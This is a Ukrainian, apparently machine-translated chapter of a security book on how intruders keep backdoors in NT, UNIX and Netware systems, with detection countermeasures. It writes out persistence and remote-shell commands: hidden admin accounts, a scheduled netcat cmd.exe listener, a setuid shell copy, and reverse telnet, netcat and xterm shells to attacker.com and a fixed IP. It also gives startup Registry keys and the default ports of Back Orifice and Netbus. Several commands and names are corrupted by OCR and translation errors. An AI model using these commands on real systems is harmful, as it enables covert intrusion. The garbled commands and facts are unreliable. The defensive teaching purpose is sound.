"Потайні ходи"

Якщо непрошені гості влаштуються в системі, позбавитися від них буває важко. Навіть якщо пролом, яким вони скористалися, буде знайдений і закритий, зловмисники можуть забезпечити спеціальний механізм і швидко дістати доступ у будь-який час. Такий механізм називається потайним ходом (back door).
Виявлення і усунення такого потайного ходу — завдання майже нездійсненне, оскільки його можна створити найрізноманітнішими способами. Єдиною реальною можливістю відновлення системи після злому є повторна установка операційної системи з початкових носіїв і виконання довгої і копіткої роботи по відновленню призначених для користувача даних і додатків з перевірених резервних копій. При цьому повне відновлення здійснити дуже важко, особливо, якщо система мала нестандартну конфігурацію, яка не була документована.
У наступних розділах описані основні механізми, які використовуються зловмисниками для збереження контролю над системою. Знання цих методів допоможе адміністраторові швидко ідентифікувати такі вторгнення і по можливості скоротити трудомісткість процесу відновлення. Де це необхідно, ми представимо докладний опис можливих підходів, проте в основному передбачається дати якомога повніший огляд популярних методів.

Створення фіктивних облікових записів

Майже кожному системному адміністраторові відомо, що облікові записи з правами суперкористувача — це такі ресурси, які легко захищати і контролювати. А ось облікові записи, рівні по привілеях суперкористувачеві, але непримітні імена, що мають, відстежити набагато важче. Зловмисник обов'язково спробує створити такі облікові записи.

Nt/2000

У Windows Nt/2000 привілейовані локальні облікові записи легко створити за допомогою наступних команд.

net user <імя_пользователя><пароль>/add
net localgrcup <імя_группи><імя_пользователя>/add

C:\>net group "Enterprise Admins"
Group name Enterprise Admins
Comment Disighated administrators of the enterprise
Members
------------
Administrator
The command completed successfully.

UNIX

У системі UNIX фіктивні облікові записи створюються і ідентифікуються аналогічним чином. Як правило створюються нешкідливі облікові записи з нульовими значеннями ідентифікаторів UID і GID. Слід перевірити також облікові записи з таким же ідентифікатором GID, що і у користувача root, а потім перевірити збіг властивостей груп у файлі /etc/groups. Крім того, такі облікові записи легко виявити по вмісту файлу /etc/passwd.

Novell

У системі Netware типовим є створення "усиротілих" об'єктів, тобто створення, наприклад, контейнера з одним користувачем, а потім передача цьому новому користувачеві прав опікунства над батьківським контейнером. Якщо зломщик має можливість постійно реєструватися в дереві NDS, то цю ситуацію не зможе виправити навіть адміністратор. Докладнішу інформацію про "потайні ходи" системи Netware можна знайти в розділі 7.

Завантажувальні файли

У попередніх розділах багато мовилося про "потайні ходи", які створюються за допомогою механізмів завантаження, підтримуваних різними платформами. Такий спосіб став улюбленим методом зловмисників, оскільки він дозволяє встановлювати пастки, які активізуються при кожному перезапуску системи необачними користувачами.

Nt/2000

У операційній системі Windows NT насамперед потрібно перевірити різні теки, що знаходяться в теці Startup: %systemroot%\profiles\%username%\ start menu\programs\startup (тека All Users використовуватиметься незалежно від того, хто з користувачів реєструвався інтерактивно). Крім того, для запуску програм типу "троянський кінь" або для установки "потайного ходу" при кожному запуску системи зломщики можуть скористатися параметрами системного реєстру. Потрібно перевірити наступні параметри
Hklm\software\microsoft\windows\currentversion\ 

•  ...Run
•  ...Runonce
•  ...Runonceex
•  ...Runservices
•  ...Aedebug 
•  ...Winlogon

Використання броузера Web для завантаження коди

Поява в травні 2000 року сценарію ILOVEYOU, написаного на мові Visual Basic,  послужило свідоцтвом того, що є і інші способи запуску виконуваної коди: це установка початкової сторінки, що завантажується при запуску web-броузера.
Сценарій ILOVEYOU модифікував параметри Internet Explorer так, щоб як початкова використовувалася сторінка, з якою завантажувався виконуваний файл з ім'ям win-bugsflx.exe. Цей файл завантажувався з однієї з чотирьох різних адрес URL, вибраних випадковим чином на базі наступного загального шаблону.

http://www.skynet.net/-[змінна]/
[длінная_строка_с_ненужной_інформацией]/
Win-bugsflx.exe" 

Мал. 14.1. У діалоговому вікні Internet Explorer, що містить застережливо повідомлення, користувач указує, чи потрібно завантажити файл на комп'ютер локально або запустити його з видаленого вузла. Завжди встановлюйте режим Save this program to disk (зберегти програму на диску)!

Hklm\software\microsoft\windows\currentversion\run\win-bugsfix
Hkcuxsoftware\microsoft\internet Explorer\main\start Page\about:blank

Контрзахід: не запускайте виконувані файли, знайдені в Internet!

Має бути зрозуміле і без слів (хоча впродовж багатьох років це повторюється багато раз): потрібно бути гранично обережним по відношенню до виконуваних файлів, що завантажуються з Internet. Запуск файлів з видаленого сервера — це шлях, ведучий прямо до катастрофи. Замість цього краще завантажити їх на свій комп'ютер локально, перевірити на наявність вірусів, по можливості проаналізувати вміст (наприклад, файлів сценаріїв або командних файлів), а потім протестувати їх на якій-небудь другорядній системі.

UNIX

У системі UNIX зломщики часто поміщають програми, призначені для створення "потайного ходу", у файли rc.d. Слід перевірити кожен з таких файлів і переконатися, що в них не міститься жодної незнайомої програми або такий, яка була б недавно додана. Для впровадження пасток може бути використаний також файл inetd.conf. У цьому файлі знаходяться параметри демона inetd, суперсервера Internet системи UNIX, який при необхідності динамічно запускає різні процеси, такі як FTP, telnet, finger і так далі У цьому файлі також можна виявити підозрілі демони.
Іншим методом визначення змін в системних файлах систем UNIX або NT є використання програми Tripwire (http://www.tripwire.com). Комерційна версія цієї популярної програми може працювати на багатьох платформах, включаючи Windows NT 4.0 Sp3 і вище, Red Hat Linux 6.1 і Solaris 2.6 і 7. Ця програма створює сигнатуру кожного файлу, що автономно зберігається. |?сли файл був змінений без відома його власника, то програма Tripwire повідомить, коли і як до нього були внесені зміни.

Novell

Файли startup.ncf і autexec.ncf системи Netware дозволяють визначити, які програми, параметри і завантажувані модулі системи Netware (NLM — Netware Loadable Module) будуть запущені при завантаженні сервера. Зломщики можуть відредагувати один або декілька файлів . NCF, які викликаються з цих завантажувальних файлів (наприклад, файл Idremote.ncf) і, таким чином, створити "потайний хід", наприклад запустити хакреську програму rconsole. Тому періодично перевіряйте кожен завантажувальний файл, щоб не упустити момент створення зломщиками "потайного ходу".
Завантажувальні файли — дуже зручне, але далекий не єдиний засіб створення "потайного ходу". Для цього підходять також черги запланованих завдань. У системі Windows NT ця можливість забезпечується службою Schedule, доступ до якої можна отримати за допомогою команди AT. Запланувавши регулярний запуск необхідної програми, зломщики можуть бути упевнені, що потрібна ним служба буде завжди запущена і готова до роботи.

Заплановані завдання

Наприклад, в системі Windows NT простий "потайний хід" можна реалізувати, встановивши утиліту netcat, яка щодня запускатиметься в призначений час.

C:\>at\\192.168.202/44 12:ооа /every:!
""nc -d -l -р 8080 -і cmd.exe"
Added а new job with job ID = 2

ср /bin/csh /tmp/evilsh
chmod 4777 /tmp/evilsh

Контрзаходи: захист від запланованих завдань

Для того, щоб запобігти цій атаці в системі NT, з використанням команди at перевірте список завдань на предмет наявності в нім несанкціонованих завдань.

С:\> at
Status ID Day Time Command Line
---------------------------------
0 Each 1 12:00 AM net localgroup administrators joel /add

Видалене управління

Цілком можлива ситуація, коли зломщик не зможе повернутися на цільовий комп'ютер, навіть володіючи необхідними реєстраційними даними. Це може відбутися, якщо деякі службові процеси сервера не виводять запрошення на реєстрацію. Наприклад, мало користі від пароля root, якщо на зламуваному сервері відключені грами-служби або telnet. Так само в системі Windows NT адміністратор за умовчанням дістає дуже обмежені можливості видаленого управління. Тому першочергова мета зломщика полягає в забезпеченні механізмів повторного доступу.
В більшості випадків все, що дійсно потрібне зломщикові, — це видалений командний рядок. Нижче представлений огляд засобів, за допомогою яких досить просто дістати видалений доступ до командної оболонки. Крім того, враховуючи широку поширеність операційних систем з графічним інтерфейсом і простоту управління, що надається ними, ви познайомитеся з інструментами, які виявляться корисними і в цьому випадку.
Контрзаходи проти засобів видаленого управління приводяться в кінці розділу, оскільки більшість з них можна застосовувати для захисту від всіх з описаних атак.

netcat

У цій книзі раніше вже згадувався "швейцарський армійський ніж", утиліта netcat (її версії як для системи NT, так і для UNIX можна знайти за адресою http.//www. 10pht.com/~weld/netcat/index.html). За допомогою цієї програми можна непомітно прослуховувати потрібний порт, виконуючи заздалегідь визначені дії після установки видаленого з'єднання з системою. Утиліта netcat виявиться надзвичайно могутнім засобом видаленого управління, якщо ці дії будуть направлені на запуск командної оболонки. Потім зловмисники можуть підключитися за допомогою netcat до заданого порту і отримати в своє розпорядження командну оболонку. Команди запуску netcat в режимі прослуховування зазвичай скритно поміщаються в який-небудь завантажувальний файл (див. попередній розділ), тому ця програма прослуховування портів активізуватиметься при кожному перезавантаженні системи. Приклад такого "потайного ходу" показаний на мал. 14.2, на якому видно параметр системного реєстру Windows NT, що приводить до запуску утиліти netcat в процесі завантаження системи.

Кмітливі зломщики обов'язково замаскують свого "троянського коня" netcat. Для цього можна дати програмі яке-небудь нейтральне ім'я, наприклад ddedll32.exe, або таке, що адміністратор двічі подумає, перш ніж видалить такий файл.

Мал. 14.2. У системному реєстрі Nt4 встановлене, що в процесі завантаження системи завантажуватиметься утиліта netcat

remote.exe (NT)

Утиліту remote з набору NTRK можна запустити як сервер, щоб командний рядок повертався будь-якому аутентіфіїірованному користувачеві NT, який підключився за допомогою відповідного видаленого клієнта. Цю програму дуже просто встановити (потрібно просто скопіювати файл remote.exe у системний каталог, наприклад %systemroot%). Тому часто її використання передує подальшій установці небезпечніших програм, таких як графічні утиліти видаленого управління або програми-реєстратори натиснення клавіш. Детальніше утиліта remote.exe описана в розділі 5.

loki

Програми loki і lokid, коротко розглянуті в розділі 11. надають зломщикам простою механізм повторного отримання доступу до зламаної системи, навіть якщо вона розташована позаду брандмауера. Оригінальність цих програм полягає в тому, що клієнт (loki) поміщає команди зломщика (в основному це пакети IP) в заголовки ICMP або UDP і посилає їх серверу (lokid), який виконує їх і повертає результати. Оскільки багато брандмауерів допускають проходження на сервер пакетів ICMP і UDP, то ініційований зломщиком трафік часто без проблем проходить через брандмауер. Сервер lokid запускається за допомогою наступної команди.
lokid -p -i v 1
Потім для запуску клієнта потрібно ввести таку команду. loki -d 172.29.11.191 -p -i -v 1 -t 3
Використовувані спільно, утиліти loki і lokid забезпечують постійний "потайний хід" в систему, іноді навіть через брандмауер.

Back Orifice і Netbus

Хоча обидва цих засоби за своєю природою є графічними (Netbus навіть надає деякі можливості по управлінню робочим столом), вони головним чином видалено викликають функції програмного інтерфейсу API. Отже краще за них розцінювати їх як інструменти створення "потайних ходів", призначені для виконання видалених команд, а не як графічні утиліти видаленого управління. Можливості кожною з цих утиліт описані в розділах 4 і 5. Тут же ми лише ще раз перерахуємо ті місця, в яких зломщики можуть скритно розміщувати ці засоби, щоб адміністраторам було легко їх розшукати.
Сервер Back Orifice (У) можна набудувати так, щоб він встановлювався і запускався під будь-яким ім'ям (за умовчанням використовується ім'я [пропуск],ехе). При цьому в параметр Hkey_local_machine\software\microsoft\ Windows\currentversicn\runservices додається новий запис, так що сервер В запускатиметься кожного разу при завантаженні системи і прослуховувати порт 31337, якщо не задано іншого значення. (Вгадайте, чому вибраний саме цей порт?)
Літом 1999 року вийшла нова версія пакету Back Orifice. Back Orifice 2000 (Bo2k. http://www.bo2k.com), що володіє всіма можливостями своєї попередниці, але з двома примітними особливостями. Його можна використовувати в Windows Nt/2000 (а не тільки Win 9.x), а, крім того, є комплект інструментів розробника, що дозволяє створювати модифікації програми, що значно утрудняє її виявлення. За умовчанням програма Во2к самостійно копіюється у файл Umgr32.EXE каталога %systemroot% і прослуховує TCP-порт 54320 або UDP-порт 54321. При цьому в списку процесів сервер Во2к відображається під ім'ям EXPLORER, що запобігає спробам його видалення. Якщо програма працює в прихованому режимі, то вона встановлюється як служба з ім'ям Remote Administration Service (служба видаленого адміністрування) і в параметрі системного реєстру Hklm\softwarexmicrosoft\ Windows\currentversion\runservices містяться відповідні дані. При цьому запуск "служби" виконується при завантаженні системи, л початковий файл віддаляється. Всі ці параметри легко змінити за допомогою утиліти bo2kcfg.exe, яка входить до складу пакету.
Програма Netbus також є такою, що достатньо легко настроюється, і в Internet можна знайти декілька її версій. За умовчанням виконуваний файл сервера називається patch.exe, хоча він може мати і будь-яке інше ім'я. Для того, щоб це серверне застосування запускалося кожного разу при завантаженні системи, в параметр Hkey_lcal_machine\software\microsoft\ Windows\currentversion\run поміщається відповідний запис. За умовчанням програмою Netbus прослуховується порт TCP 12345 або 20034 (за бажання ці значення також можна змінити).

Контрзаходи: захист проти Back Orifice (і інших програм)

Спроби використання Back Orifice (а також служб FTP, telnet, SMTP, HTTP і так далі) легко виявити, використовуючи безкоштовну утиліту фірми Network Flight Recorder, яка називається Backofficer Friendly (http://www.nfr.net/products/bof/ ). Ця програма з графічним інтерфейсом працює в режимі прослуховування портів і повідомляє про всі спроби з'єднання з системою. Її найчудовішою особливістю є режим Fake Replies (помилкові відповіді). При його використанні програма відповідатиме на telnet-запросы і записуватиме імена і паролі, за допомогою яких зломщики намагаються дістати доступ. Як видно з наступного малюнка, програма виконує велику роботу по відстежуванню спроб проникнення в систему.

Якщо відомий пароль, то програму Во2к можна легко видалити на видаленому комп'ютері. Для цього за допомогою клієнтського застосування потрібно з'єднатися з сервером, в діалоговому вікні розкрити теку Server Control і вибрати команду Shutdown Server з параметром DELETE.

Перенаправлення портів: реверсивний сеанс telnet, netcat, datapipe, rinetd і fpipe

У попередніх розділах деякі команди видаленого управління, засновані на використанні командного процесора, описувалися в контексті прямих з'єднань. Тепер розглянемо ситуацію, коли прямому втручанню в систему щось перешкоджає, наприклад прямий доступ блокується брандмауером. Винахідливі зломщики можуть обійти ці перешкоди за допомогою перенаправлення портів (port redirection).
Якщо зломщикові вдалося зламати брандмауер, то за допомогою перенаправлення портів він зможе направити всі пакети на необхідний вузол. Важливо з'ясувати можливі наслідки зломів цього типу, оскільки зломщик може дістати доступ до будь-якої системи, яка знаходиться позаду брандмауера. Перенаправлення функціонує за наступним принципом: ведеться прослуховування певних портів і перехоплені на них необроблені пакети перенаправляються на потрібну вторинну адресу. Нижче будуть розглянуті деякі методи виконання перенаправлення портів уручну, використовуючи такі утиліти, як telnet і netcat, а також такі спеціалізовані засоби перенаправлення, як datapipe і rinetd.

Реверсивний сеанс telnet

Одін з коханих зломщиками "потайних ходів" в зламану систему може бути реалізований за допомогою демона telnet, що входить в комплект постачання багатьох версій UNIX. Отже цю програму навіть не потрібно буде завантажувати. Ми називаємо цей спосіб реверсивний сеанс telnet, тому що в процесі його реалізації утиліта telnet використовується для з'єднання з утилітою netcat, запущеною на комп'ютері зломщика, що знаходиться в режимі прослуховування. Потім необхідні команди прямують на цільовий вузол, а результати їх виконання — назад.
Щоб реалізувати реверсивне з'єднання telnet, на своєму комп'ютері спочатку потрібно запустити два екземпляри утиліти netcat, використовуючи для цього дві окремі команди.

С:\> nc -w -1 -р 80
D:\> nc -w -1 -р 25

sleep 10000 | telnet 172.29.11.191 80 |
/bin/sh | telnet 172.29.11.191 25

Порти з попереднього прикладу (80 і 25) використовуються стандартними службами (HTTP і SMTP відповідно). Тому зазвичай наступний через них потік повідомлень вільно проходить через брандмауер на багато внутрішніх вузлів.

Захоплення командної оболонки за допомогою утиліти netcat

Якщо на цільовий комп'ютер можна помістити утиліту netcat, або якщо вона там вже встановлена, то можна скористатися аналогічним методом. Такий підхід ми називаємо "захоплення командної оболонки", тому що його суть полягає в тому, що на своєму робочому комп'ютері зломщик дістає в повне розпорядження всі функціональні можливості видаленої командної оболонки. Розглянемо приклад, коли у видаленому командному рядку запускається наступна команда.

nс attacker.com 80 | cmd.exe | nс attacker.com 25

Мал. 14.3. Запустивши утиліту netcat на комп'ютері зломщика (на малюнку показаний його робочий стіл) і на цільовому вузлі, можна "захопити" видалену командну оболонку. Команди, які вводяться у верхньому вікні, виконуються на видаленій системі, а результати їх роботи — в ніжнем

datapipe

Реалізація перенаправлення портів за допомогою утиліти netcat і ручне налаштування цього процесу може виявитися досить морочливою справою. У Internet можна знайти декілька програм, які призначені спеціально для цих цілей. У системі UNIX дуже популярна утиліта datapipe. З її допомогою зломщик може забезпечити перенаправлення даних так, щоб пакети приймалися через порт 65000 і переадресовувалися в систему NT (порт 139). Далі, на своєму комп'ютері зловмисник може набудувати систему для виконання прямо протилежних дій: запустити утиліту datapipe для прослуховування порту 139 і перенаправлення повідомлень на порт 65000 цільової системи. Наприклад, для нападу на систему NT (172. 29.11.100), розташовану позаду брандмауера, на зламаному вузлі (172.29.11.2) потрібно виконати наступну команду.

datapipe 65000 139 172.29.11.100

datapipe 139 65000 172.29.11.2

rinetd

Утиліта rinetd — це "сервер перенаправлення Internet", створений Томасом Бутеллом (Thomas Boutell). Ця програма перенаправляє з'єднання TCP з однієї IP-адреса і порту на іншій. Таким чином, вона. багато в чому схожа на програму datapipe. Програма працює як на базі інтерфейсу Win32 (включаючи Windows 2000), так і в системі Linux УТН..ПГ rinetd дуже легко використовувати: потрібно просто створити конфігураційний файл, в якому указується правило перенаправлення. Цей файл має наступний формат

адрес_прівязки порт_прмвязки адрес_соєдіненія порт_соєдіненія

fpipe

Утиліта fpipe призначена для передачі/перенаправлення даних з порту TCP. Її розробили автори цієї книги, що займають ключові позиції в компанії Foundstone, Inc. Ця програма створює потік TCP. витікаючий з вибраного користувачем порту. Вона чудово підходить для перенаправлення, представленого на мал. 14.4, і в системі Windows може послужити рівноцінною заміною програми datapipe, застосовною тільки до UNIX.
Одна з особливостей утиліти fpipe, що відрізняють її від інших засобів перенаправлення портів, які можна використовувати в системі Windows (таких як rinetd), полягає в можливості завдання початкового порту передаваного трафіку. Щоб оцінити "проникаючу" здатність цієї програми, потрібно спробувати "обдурити" з її допомогою брандмауер або маршрутизатор, які пропускають потік повідомлень лише з певних портів (наприклад, пакети з TCP-порта 25 можуть оброблятися поштовим сервером). Зазвичай в протоколі Tcp/ip початковим портам, використовуваним для клієнтських з'єднань, призначаються великі номери, а відповідний потік повідомлень фільтрується брандмауером. Проте може опинитися, що брандмауер пропускає трафік DNS (а в більшості випадків це саме так). Тоді за допомогою утиліти fpipe можна забезпечити проходження цього потоку з певного початкового порту. У такій ситуації брандмауер розглядає цей потік як дозволений і пропускає його.

Мал. 14.4. Перенаправлення портів

Користувачі повинні знати, що, якщо при завданні порту-джерела витікаючого з'єднання був використаний параметр -в і це з'єднання було закрито, може виявитися неможливим встановити його повторно (утиліта fpipe повідомить, що адреса вже використовується) до того моменту, поки не закінчаться інтервали очікування Time_wait і Close_wait, визначувані протоколом TCP. Ці інтервали очікування можуть варіюватися в діапазоні від 30 секунд до чотирьох хвилин і більш, залежно від використовуваної версії операційної системи і її версії. Ці інтервали очікування визначаються протоколом TCP і не є обмеженням самої утиліти fpipe. Причина виникнення такої ситуації полягає в тому, що утиліта fpipe намагається встановити нове з'єднання з видаленим вузлом із застосуванням тих же комбінацій локальних IР-адреса/порту і видалених IP-адреса/порту, що і в попередньому сеансі. Нове ж з'єднання не може бути встановлене до тих пір, поки стеком протоколів TCP не буде вирішено, що попереднє з'єднання не було повністю завершене.

VNC

Розглянуті раніше засоби видаленого управління надають можливість практично повного контролю над системою. Тому при одній тільки думки про можливість отримання в свої руки віртуального робочого столу цільової системи у зломщиків частішає серцебиття. Програма Virtual Network Computing (VNC) надає саме такі можливості. Крім того, цей програмний продукт легко встановити на "захопленій" системі і використовувати її як "потайний хід", що забезпечує діставання доступу згодом.
Пакет VNC розроблений в лабораторії At&t Laboratories Кембріджського університету, і, поза сумнівом, є кращим безкоштовним графічним засобом видаленого управління. В розділі 5 було показано, як легко інсталювати цю програму в Windows NT через видалене мережеве з'єднання. Для цього потрібно лише встановити службу VNC з командного рядка, зробивши перед цим єдину зміну в системному реєстрі, щоб забезпечити її скритний запуск (версії вище 3.3.2 перешкодять піктограму на панель завдань і можуть бути легко виявлені користувачами, які реєструвалися інтерактивно). Звичайно ж, незалежно від версії або вибраного режиму процес winvnc. EXE буде відображений в списку процесів.

Злом X Windows і інших графічних термінальних служб

На вузлах UNIX, на яких не обмежується витікаючий трафік додатку xtenn (TCP 6000). можна модифікувати деякі з приведених раніше методів перенаправлення портів, щоб "захопити" вікно терміналу і перенаправити таким чином віконну командну оболонку назад на комп'ютер зломщика. Для цього досить запустити Х-сервер, а потім ввести наступну команду. 

xterrn -display attacker.соm:0.о&

D:\toclbox>sclist athena
- Service list for ath'ena
running Alerter Alerter
running Termservice Terminal Services
running Terrriservlicensing Terminal Services Licensing
stopped TFTFD Trivial FTP Daemon
stopped Tlntsvr Telnet

Загальні контрзаходи проти "потайних ходів": профілактичний огляд

Ви познайомилися з численними засобами і методами, до яких удаються зломщики для створення "потайних ходів". Як же адміністратор може виявити і нейтралізувати залишені зломщиками сліди?

Засоби автоматизації

Як мовиться, легко запобігти, чим знешкоджувати. Багато сучасних комерційних антивірусних програмних продуктів непогано працюють, автоматично скануючи систему у пошуках таких програм. Часто вони нейтралізують небезпеку ще до того, як буде причинна реальна шкода (наприклад, до діставання доступу до дисковода для гнучких дисків або до завантаження вкладення електронного повідомлення). Достатньо повний перелік виробників антивірусних програм можна знайти в статті Q49500 бази знань компанії Microsoft за адресою http://support.microsoft.com/support/ kb/articles/q49/5/00.ASP.
Недорога програма The Cleaner, поширювана компанією Moosoft Development, здатна ідентифікувати і знешкоджувати більше тисячі різних видів програм типу "троянський кінь" (в усякому разі так мовиться в рекламних матеріалах). Для отримання докладнішої інформації звернетеся за адресою http: //www. moosoft.com/сleaner.html.
При виборі програми упевніться, що вона здатна виконувати пошук по таких важливих критеріях, як двійкові підписи і параметри системного реєстру. Це буває корисно, якщо зломщики-тугодуми не здогадалися внести відповідні зміни і приховати свою присутність. Потрібно пам'ятати також про те, що антивірусні програми виявляться ефективними тільки в тому випадку, якщо їх бази даних постійно оновлюються!

Ведення обліку

Припустимо, що всі прийняті запобіжні засоби не допомогли і система все ж таки виявилася зламаною. У такій ситуації єдиною зброєю проти майже всіх описаних раніше прийомів створення "потайних ходів" є пильність. З боку адміністратора було б розумним вести всесторонній облік стану системи і продумати, де можна швидко розмістити надійні дані для відновлення системи. Ми настійно рекомендуємо виконувати інвентаризацію найбільш важливих систем, реєструючи дані як про початкову установку, так і про кожне їх оновлення.
Відстежування стану системи в швидко змінних умовах, особливо на персональних робочих станціях, може виявитися досить утомливим заняттям. А ось на щодо статичних робочих серверах подібний облік може стати корисною підмогою в процесі перевірки цілісності вузла, який, ймовірно, піддався нападу. Спростити це завдання допомагають інструменти відображення стану системи, які розглядатимуться нижче в цьому розділі. У частині даного розділу, що залишилася, обговорюються методи відстежування змін системи "уручну", які не вимагають додаткових витрат (багато хто з них доступний в більшості систем). Якщо еше до вторгнення послідувати простим рекомендаціям, приведеним нижче, то після злому буде набагато легко зрозуміти, що ж відбулося. Багато з цих методів корисно застосувати і після нападу, як слідчий експеримент.

Хто прослуховує порти

Можливо, це очевидно, але ніколи не варто недооцінювати потужність утиліти netstat. яка дозволяє виявити факт прослуховування портів програмами, які аналогічні розглянутим вище. Наступний приклад демонструє корисність цього інструменту (скорочено приводиться не весь лістинг).

D:\toolbox>netstat-an
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:54320 0.0.0.0:0 LISTENING
TCP 192.168.234.36:139 0.0.0.0:0 LISTENING
UDP 0.0.0.0:31337 *:*

D:\toolbox>fport
fport - Process port mapper Copyright (c) 2000, Foundstone, Inc.
http://www.foundstone.com
PID NAME TYPE PORT
222 IEXPLORE UDP 1033
224 OUTLOOK UDP 1107
224 OUTLOOK UDP 1108
224 OUTLOOK TCP 1105
224 OUTLOOK UDP 1106
224 OUTLOOK UDP 0
245 Mapisp32 UDP 0
266 nc TCP 2222

Видалення підозрілих процесів

Ще одна можливість виявлення "потайного ходу" полягає в перевірці списку процесів на наявність в нім таких виконуваних файлів, як nc, WINVNC. exe і так далі Для цього в системі NT можна використовувати утиліту pulist з набору NTRK, яка виводить всі запущені процеси, або sclist, що показує працюючі служби.

Таблиця 14.1. Номери портів, використовувані програмами і видаленого управління при створенні "потайних ходів"

Команди pulist і sclist прості у використанні. Їх зручно застосовувати у файлах сценаріїв для автоматизації процесу тестування як на локальній системі, так і в мережі. Як приклад приведемо список процесів, що виводиться програмою pulist.

С:\nt\ew>pulist
Process PID User
Idle 0
System 2
smss.exe 24 NT AUTHORITYXSYSTEM
CSRSS.EXE 32 NT AUTHORITYXSYSTEM
WINLOGON.EXE 38 NT AUTHORITYXSYSTEM
SERVICES.EXE 46 NT AUTHORITYXSYSTEM
LSASS.EXE 49 NT AUTHORITYXSYSTEM
CMD.EXE 295 Toga\administrator
nfrbof.exe, 265 Toga\administrator
Uedit32.EXE 313 Toga\administrator
NTVDM.EXE 267 Toga\administrator
PULIST.EXE 309 Toga\administrator
C:xntxew>

C:\nt\ew>sclist \\172.29.11.191
---------------
- Service list for \\172.29.11.191
---------------
running Alerter Alerter
running Browser Computer Browser
stopped Clipsrv Clipbook Server
running DHCP DHCP Client
running Eventlog Eventlog
running Lanraanserver Server
running Lanmanworkstation Workstation
running Licenseservice License Logging Service
stopped Schedule Schedule
running Spooler Spooler
stopped Tapisrv Telephony Service
topped UPS UPS

[crush] lsof -i
COMMAND PID USER FD TYPE DEVICE Size/off NODE NAME
syslogd 111 root 4u Ipv4 Oxc5818foo OTO UDP *:syslog
dhcpd 183 root 7u Ipv4 Oxc5818e40 OTO UDP *:bootps
dhcpd 183 root lou Ipv4 Oxc5bc2foo OTO ICMP *:*
sshd 195 root 3u Ipv4 Oxc58d9d80 OTO TCP *:ssh (LISTEN)
sshd 1062 root 4u Ipv4 Oxcssdasco OTO TCP crush:ssh-
>192. 168.1.101:2420 (ESTABLISHED)
Xaccel 1165 root 3u Ipv4 Oxc58dad80 OTO TCP *:6000 (LISTEN)
gnome-ses 1166 root 3u Ipv4 Oxc58dab60 OTO TCP *:1043 (LISTEN)
panel 1201 root 5u Ipv4 Oxc58da940 OTO TCP *:1046 (LISTEN)
gnome-nam 1213 root 4u Ipv4 Oxc58da2eo OTO TCP *:1048 (LISTEN)
genj.itil_ 1220 root 4u Ipv4 Oxc58dbd80 OTO TCP *:1051(LISTEN)
sshd " 1245 root 4u Ipv4 Oxc58da720 OTOTCP crush:ssh-
>192.163.I.101:2642 (ESTABLISHED)
[crush] sockstat
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
root sshd 1245 4 tcp4 10.1.1.1.22 192.168.1.101.2642
root genjjtil 1220 4 tcp4 *.1051 *.*
root gnome-na 1213 4 tcp4 *.1048 *.*
root panel 1201 5 tcp4 *.1046 *.*
root gnome-se 1166 3 tcp4 *.1043 *.*
root Xaccel 1165 3 tcp4 *.6000 *.*
root sshd 1062 4 tcp4 10.1.1.1.22 192.168.1.101.2420
root sshd 195 3 tcp4 *.22 *.*
root dhcpd 183 7 udp4 *.67 *.+
root syslogd 111 4 udp4 *.514 *.*

Відстежування змін файлової системи

Для переобтяжених роботою адміністраторів сама думка про регулярне оновлення повного списку файлів і каталогів може показатися божевільною, оскільки це вимагає набагато більших витрат, чим всі попередні рекомендації. В той же час, якщо стан системи змінюється не дуже часто, такий облік є найнадійнішим методом виявлення слідів зловмисників.
У системі Novell для відстежування змін в розмірах файлів, часу останнього звернення і інших атрибутів можна скористатися командою ndir. У системі UNIX можна написати сценарій, що містить команду Is -la, який записуватиме ім'я кожного файлу і його розмір. У Windows при використанні команди dir виводиться час останньої зміни, час останнього звернення до файлу, а також нею розмір. Для ведення каталога файлів без зміни часу доступу до них можна порекомендувати утиліти а find, hfind і sfind компанії Ntobjectives. Окрім інших достоїнств, ці програми дозволяють ідентифікувати приховані файли, а також виявляти потоки даних усередині файлів. Для аудиту файлів в системах Nt/2000 можна використовувати також вбудовані можливості файлової системи NTFS. Просто клацніть правою кнопкою миші на потрібному файлі або каталозі, виберіть команду Security, клацніть на кнопці Auditing, і встановите необхідні параметри для кожного користувача або групи.
У Windows 2000 з'явилася підсистема захисту файлів (WFP — Windows File Protection), що забезпечує захист системних файлів від перезапису (до них відноситься близько 640 файлів з каталога %systemroot%). Цікавий побічний ефект цього нововведення полягає в тому, що хэш-коды Sha-1 цих важливих файлів містяться у файлі каталога %systemroot%\system32\dllcache\nt5.cat. Тому, порівнюючи еталонні хэш-коды з хэш-кодами поточних системних файлів, можна перевірити їх цілісність. Таку перевірку можна виконати з використанням засобу верифікації сигнатури файлів (File Signature Verification, sigverif.exe). Для цього клацніть на кнопці Advanced, перейдіть у вкладку Logging і встановите режим Append Те Existing Log File, щоб нові результати можна було порівнювати з отриманими раніше. Проте потрібно мати на увазі, що в режимі. WFP сигнатура, швидше за все, не зв'язується з кожним окремим файлом. Як відзначив в травні 2000 року Русявий Купер (Russ Cooper), підсистема захисту WFP не помічає копіювання одного з "помічених" файлів поверх іншого (наприклад, непоміченим залишиться копіювання notepad.exe поверх wscript.exe). В процесі тестування поверх файлу wscript.exe ми скопіювали файл, що немає системним, і утиліта sigverif все одно підтвердила його цілісність! Тому краще поки не покладатися на ці нові засоби, поки не будуть розгадані причини такої дивної поведінки.
Серед засобів сторонніх виробників можна згадати програму перевірки цілісності файлів Mdssum. Вона входить до складу пакету Textutils, який розповсюджується в рамках загальної ліцензії GNU.  Версію, скомпільовану для системи Windows, можна знайти за адресою http://sourceware.cygnus.com/cygwin/. Утиліта Mdssum на основі поширеного алгоритму Md5, розробленого Роном Рівестом (Ron Rivest) з лабораторії комп'ютерних наук Массачусетського технологічного інституту, дозволяє обчислити або перевірити профільне повідомлення (message digest) файлу завдовжки 128 битий. Опис програми приведений в документі RFC 1321. У наступному прикладі показано, як програма Mdssum генерує контрольну суму файлу test, txt, а потім виконує її перевірку.

D:\toolbox>md5sum d:\test.txt>d:\test.md5
D:\toolbox>cat d:\test.md5
efd3907b04b037774d831596f2clbl4a d:\xtest.txt
D:\toolbox>md5sum --check d:\test.md5
d:\xtest.txt: OK

Таблиця 1 4.2. Використовувані за умовчанням імена виконуваних файлів утиліт удаленногоуправленія

Завантажувальний файл і параметри системного реєстру

